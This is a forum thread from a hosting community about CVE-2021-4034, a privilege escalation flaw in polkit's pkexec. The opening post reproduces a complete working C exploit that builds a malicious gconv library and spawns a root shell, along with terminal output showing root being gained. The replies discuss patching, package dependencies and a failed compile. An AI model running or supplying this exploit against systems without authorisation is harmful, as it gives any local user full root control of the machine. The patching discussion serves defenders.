New on LowEndTalk? Please Register and read our Community Rules.
CVE-2021-4034 - Polkitd privilege escalation (HIGH VULN)
Hi LET community,
A new CVE has come to light in polkit's pkexec calls. It allows any user to become a root user:
The exploit is also given in the example, and it works unfortunately on my Ubuntu 20 machine;
randomuser@node2:~$ gcc test.c -o a
randomuser@node2:~$ ./a
[~] compile helper..
[~] maybe get shell now?
# id
uid=0(root) gid=0(root) groups=0(root),116(lxd),1010(randomuser)
Redhat/CentOS/Alma/etc CVE patch:
Debian/UB CVE patch:
For anyone that wants to try the exploit:
/*
* blasty-vs-pkexec.c -- by blasty <[email protected]>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
void fatal(char *f) {
perror(f);
exit(-1);
}
void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}
char so_code[]=
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);
system("gcc -o payload.so -shared -fPIC payload.c");
}
int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};
printf("[~] compile helper..\n");
compile_so();
if (stat("GCONV_PATH=.", &st) < 0) {
if(mkdir("GCONV_PATH=.", 0777) < 0) {
fatal("mkdir");
}
int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777);
if (fd < 0) {
fatal("open");
}
close(fd);
}
if (stat("lol", &st) < 0) {
if(mkdir("lol", 0777) < 0) {
fatal("mkdir");
}
FILE *fp = fopen("lol/gconv-modules", "wb");
if(fp == NULL) {
fatal("fopen");
}
fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
fclose(fp);
}
printf("[~] maybe get shell now?\n");
execve("/usr/bin/pkexec", a_argv, a_envp);
}
Comments
Lovely
Wow.
That's quite epic :O
Had to instantly check, no we do not have pkexec installed on our servers
Ah that's great to see
! I just updated and tested all my servers, patched 11/14 i own, quite a lot honestly. I'm surprised this isn't a higher CVE rating. yeah you can easily patch it without downtime but the impact can be extreme, because it's this easy to gain root access.
I wonder if going with a minimal install would not include pkexec, making minimal be more secure than non-minimal version of the distro
There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/
I've check into directadmin and cPanel (with cloudlinux version). Successfully Not compiled, since pkexec: command not found in user shell access.
But it's successfully get into shell to my vps, maybe because this point
But where's the cool name a logo and web site?
Heartbleed, Log4Shell, Spectre - vulnerabilities these days are expected to have a brand.
I suggest...hmmm...maybe PolDancer.
but did you check id once on that shell?
Just checked and none of my Debian 11 VMs are running polkit, or even have the package installed, and the exploit doesn't work tehre.
My home Deb 11 systems are running polkitd and the exploit works there (just tested).
I'm thinking you need to have a GUI running to have polkitd installed and vulnerable. Might be a Debian config quirk.
At least I don't have to worry about my 12-year-old getting root. She would use ransomware to get a better phone.
I mean, it's not compiled on cloudlinux.
Here the result :
[user@cpanel test]$ gcc test.c -o a
test.c: In function ‘compile_so’:
test.c:42:9: warning: missing terminating " character [enabled by default]
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL
^
test.c:42:9: error: missing terminating " character
test.c:43:1: error: expected ‘,’ or ‘;’ before ‘}’ token
};\n"
^
test.c:43:1: error: stray ‘\’ in program
test.c:43:5: warning: missing terminating " character [enabled by default]
};\n"
^
test.c:43:1: error: missing terminating " character
};\n"
^
test.c:43:4: error: ‘n’ undeclared (first use in this function)
};\n"
^
test.c:43:4: note: each undeclared identifier is reported only once for each fun ction it appears in
test.c:44:9: error: expected ‘;’ before string constant
" execve(\"/bin/sh\", a_argv, a_envp);\n"
Last year Qualys revealed similar kind of vulnerability in sudo that existed for almost a decade. They really like old things. Ops this is also from last year. CVE is 2021-4034.
Libvirtd has a dependency on polkit in Debian. VMs might not be vulnerable but the host systems are. I don’t know why this dependency exists, but it is not just a GUI thing
patch state: ✓ all applicable livepatch modules inserted
Premium live patching indeed.
Excellent. Wonderful.
Also Log4j has a companion now.
Why?
We must be due for an Incredible Hulk tv show remake. I'd watch it just to see that bear look real and still thrown across the lake.
Another instance of "if the attackers gain access to the Oval Office, they could do nasty things, omg"
Gcc has to be installed first.
Learning the hard way that "install only what needed" on your server. Even if the unneeded application doesn't have bug, it can be used to exploit another app's bug.
Better not use Ubuntu!
Thanks for the exploit example, @FoxelVox
I'm starting to see centos and ubuntu package mirrors getting package updates today. After updating, my CentOS 7 and Ubuntu 20 machines are no longer exploitable. I bet other distros also have updates today.
Why?
because
Well I'm using minimal CentOS, and the exploit unfortunately works. (not so minimal, because I had to install gcc first)
An attacker could always upload that compiled libary (payload.so) to a server. gcc is required in the PoC for thoroughness. pkexec should spit out help without any arguments but uses gconv to handle encoding, which can load a library, so gcc really doesn't have any part in how the exploit works.
It's a nasty nasty exploit.
Cue: 999 - Nasty, Nasty
https://youtu.be/4NxXjEPqOls
Yeah. My original thought was just remove polkit or get rid of its root sticky bit permission, but NetworkManager seemed to depend on it. Glad the package updates came so quickly.
Clicking on random yt link described as "Nasty, Nasty" is rarely a good idea.